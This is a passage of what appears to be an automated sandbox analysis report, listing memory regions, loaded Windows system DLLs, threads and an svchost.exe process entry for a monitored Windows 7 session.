0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3730 start_va = 0x27e0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 3731 start_va = 0x2940000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 3732 start_va = 0x2a40000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 3733 start_va = 0x2b40000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 3734 start_va = 0x2d30000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 3735 start_va = 0x7fef8b20000 end_va = 0x7fef8bbffff entry_point = 0x7fef8b20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 3736 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3737 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3738 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3739 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3740 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3741 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 3742 start_va = 0x2d80000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 3743 start_va = 0x2f40000 end_va = 0x303ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 3744 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3745 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3746 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3747 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3748 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3749 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3750 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3751 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 3752 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3753 start_va = 0x31c0000 end_va = 0x32bffff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 3754 start_va = 0x32d0000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 3755 start_va = 0x3500000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 3756 start_va = 0x3600000 end_va = 0x3942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003600000" filename = "" Region: id = 3757 start_va = 0x777b0000 end_va = 0x777b2fff entry_point = 0x777b0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 3758 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3759 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3760 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3761 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3762 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3763 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3764 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3765 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3766 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3767 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3768 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3769 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3770 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3771 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3897 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 3898 start_va = 0x270000 end_va = 0x27bfff entry_point = 0x270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 3899 start_va = 0x280000 end_va = 0x281fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 3900 start_va = 0x290000 end_va = 0x297fff entry_point = 0x290000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 3901 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x2a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 3902 start_va = 0x25e0000 end_va = 0x269ffff entry_point = 0x25e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3903 start_va = 0x3960000 end_va = 0x3a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 3904 start_va = 0x3b00000 end_va = 0x3b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 3905 start_va = 0x3bf0000 end_va = 0x3ceffff entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 3906 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3907 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3908 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3909 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3910 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3911 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3912 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3913 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 3914 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3915 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3916 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3917 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 3918 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4159 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4160 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 4161 start_va = 0x3040000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 4162 start_va = 0x3190000 end_va = 0x319ffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 4163 start_va = 0x3470000 end_va = 0x34effff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 4164 start_va = 0x3d80000 end_va = 0x3e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 4165 start_va = 0x3fa0000 end_va = 0x409ffff entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 4166 start_va = 0x40a0000 end_va = 0x429ffff entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 4167 start_va = 0x42d0000 end_va = 0x43cffff entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 4168 start_va = 0x43d0000 end_va = 0x47cffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 4169 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4170 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4171 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4172 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4173 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4174 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4175 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4176 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4177 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4178 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4179 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4180 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4181 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4182 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4183 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4184 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4185 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4186 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4187 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4224 start_va = 0x7fefb4d0000 end_va = 0x7fefb4fbfff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4225 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4226 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4227 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Thread: id = 209 os_tid = 0x878 [0154.767] CreateWellKnownSid (WellKnownSidType=0xb, DomainSid=0x0, pSid=0x20f910, cbSid=0x20f900) Thread: id = 215 os_tid = 0x784 Thread: id = 216 os_tid = 0x380 Thread: id = 219 os_tid = 0x8e8 Thread: id = 221 os_tid = 0x914 Thread: id = 223 os_tid = 0x904 Thread: id = 224 os_tid = 0x650 Thread: id = 227 os_tid = 0x584 Thread: id = 228 os_tid = 0x66c Thread: id = 245 os_tid = 0x398 Thread: id = 246 os_tid = 0x7d4 Thread: id = 249 os_tid = 0x6e0 Thread: id = 250 os_tid = 0x908 Thread: id = 252 os_tid = 0x5e4 Thread: id = 301 os_tid = 0x734 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7176e000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "31" os_parent_pid = "0x888" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e167" [0xc000000f], "LOCAL" [0x7] Region: id = 3772 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3773 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3774 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3775 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3776 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3777 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3778 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3779 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3780 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3781 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3782 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3783 start_va = 0x190000 end_va = 0x1a0fff entry_point = 0x190000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3784 start_va = 0x1b0000 end_va = 0x1b3fff entry_point = 0x1b0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3785 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3786 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3787 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3788 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3789 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3790 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3791 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3792 start_va = 0x710000 end_va = 0x7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3793 start_va = 0x7d0000 end_va = 0xbc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3794 start_va = 0xc30000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3795 start_va = 0xcd0000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 3796 start_va = 0xe70000 end_va = 0x113efff entry_point = 0xe70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3797 start_va = 0x1160000 end_va = 0x11dffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3798 start_va = 0x1240000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3799 start_va = 0x12c0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 3800 start_va = 0x13c0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 3801 start_va = 0x14d0000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 3802 start_va = 0x1550000 end_va = 0x160ffff entry_point = 0x1550000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3803 start_va = 0x1630000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 3804 start_va = 0x1640000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 3805 start_va = 0x16c0000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 3806 start_va = 0x1740000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 3807 start_va = 0x17c0000 end_va = 0x183ffff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 3808 start_va = 0x1850000 end_va = 0x185ffff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 3809 start_va = 0x1870000 end_va = 0x18effff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 3810 start_va = 0x19b0000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 3811 start_va = 0x1a30000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 3812 start_va = 0x1b30000 end_va = 0x1baffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 3813 start_va = 0x1bb0000 end_va = 0x1daffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 3814 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 3815 start_va = 0x1f90000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3816 start_va = 0x2040000 end_va = 0x20bffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 3817 start_va = 0x21c0000 end_va = 0x223ffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 3818 start_va = 0x752e0000 end_va = 0x752e2fff entry_point = 0x752e0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 3819 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3820 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3821 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 